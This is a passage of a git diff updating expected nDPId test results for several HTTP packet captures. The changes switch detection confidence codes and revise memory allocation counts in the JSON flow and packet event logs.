+00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492518365663,"flow_last_seen":1492518365809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1492518365809,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"khu.sh","url":"khu.sh\/imessages.php?songify_a=3h248fIbwJ&new","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492518365663,"flow_last_seen":1492518365968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2844,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1492518365968,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":2844,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1492518365968} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9/9 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869812 bytes -~~ total memory freed........: 5869812 bytes -~~ total allocations/frees...: 118127/118127 +~~ total memory allocated....: 6003446 bytes +~~ total memory freed........: 6003446 bytes +~~ total allocations/frees...: 120889/120889 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 475 chars ~~ json string max len.......: 844 chars diff --git a/test/results/http-lines-split.pcap.out b/test/results/http-lines-split.pcap.out index 0b142c156..525f4e55c 100644 --- a/test/results/http-lines-split.pcap.out +++ b/test/results/http-lines-split.pcap.out 
@@ -4,8 +4,8 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593713340401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0t6tAAHkGyLLAqAABwKgAFJlEemkrolmxAAAAAIAC+vBZugAAAgQFtAEBBAIBAwMG"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593713340401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"YDjgxTWgABjzZLGICABFAAA0AABAALIGR17AqAAUwKgAAXppmUT8ca\/AK6JZsoAS+vCBjAAAAgQFtAEBBAIBAwMH"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593713340401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAAot6xAAHkGyL3AqAABwKgAFJlEemkrolmy\/HGvwVAQA+zlTAAAAAAAAAAA"} 
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-payload-len":1699,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593713340404} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869879 bytes -~~ total memory freed........: 5869879 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6003513 bytes +~~ total memory freed........: 6003513 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 878 chars diff --git a/test/results/http-manipulated.pcap.out b/test/results/http-manipulated.pcap.out index 24a6190f7..cff0e4246 100644 --- a/test/results/http-manipulated.pcap.out +++ b/test/results/http-manipulated.pcap.out 
@@ -4,15 +4,15 @@ 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946727901369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAA0umlAAI8Gr+7AqAAUwKgAB4NgH5BugXMeAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946727901369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg2CKV04jboFzH4AS+vCVmQAAAgQFtAEBBAIBAwMG"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946727901369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAAoumpAAI8Gr\/nAqAAUwKgAB4NgH5BugXMfildOJFAQAfaBhgAA"} -00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}} +00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":653,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":946729142063} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946729142063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAA0svlAAL4GiF7AqAAUwKgAB4OUH5ARN20zAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946729142063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg5SNfRmbETdtNIAS+vAp\/QAAAgQFtAEBBAIBAwMG"} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946729142063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAAosvpAAL4GiGnAqAAUwKgAB4OUH5ARN200jX0ZnFAQAfaBhgAA"} -00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":328,"packets-processed":328,"total-skipped-flows":0,"total-l4-payload-len":941545,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":946729148160} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 328/328 
@@ -22,9 +22,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880236 bytes -~~ total memory freed........: 5880236 bytes -~~ total allocations/frees...: 118455/118455 +~~ total memory allocated....: 6013870 bytes +~~ total memory freed........: 6013870 bytes +~~ total allocations/frees...: 121217/121217 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 984 chars diff --git a/test/results/http_auth.pcap.out b/test/results/http_auth.pcap.out index c5222af41..a6f65a602 100644 --- a/test/results/http_auth.pcap.out +++ b/test/results/http_auth.pcap.out 
@@ -4,8 +4,8 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1381844050222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1381844050222,"pkt":"TBfruiThKM\/pITwrCABFAABARSdAAEAGtjzAqAAEwP69qdRBAFCa4jGyAAAAALAC\/\/8jTAAAAgQFtAEDAwQBAQgKH38TuAAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1381844050402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1381844050402,"pkt":"KM\/pITwrTBfruiThCABFAAA8AABAADgGA2jA\/r2pwKgABABQ1EEDZtH9muIxs6ASOJA\/hAAAAgQFtAQCCAowzbX3H38TuAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1381844050402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1381844050402,"pkt":"TBfruiThKM\/pITwrCABFAAA0XSJAAEAGnk3AqAAEwP69qdRBAFCa4jGzA2bR\/oAQICuGBAAAAQEICh9\/FGkwzbX3"} 
-00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":33,"total-skipped-flows":0,"total-l4-payload-len":18376,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1381844057320} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 33/33 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870638 bytes -~~ total memory freed........: 5870638 bytes -~~ total allocations/frees...: 118153/118153 +~~ total memory allocated....: 6004272 bytes +~~ total memory freed........: 6004272 bytes +~~ total allocations/frees...: 120915/120915 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 885 chars diff --git 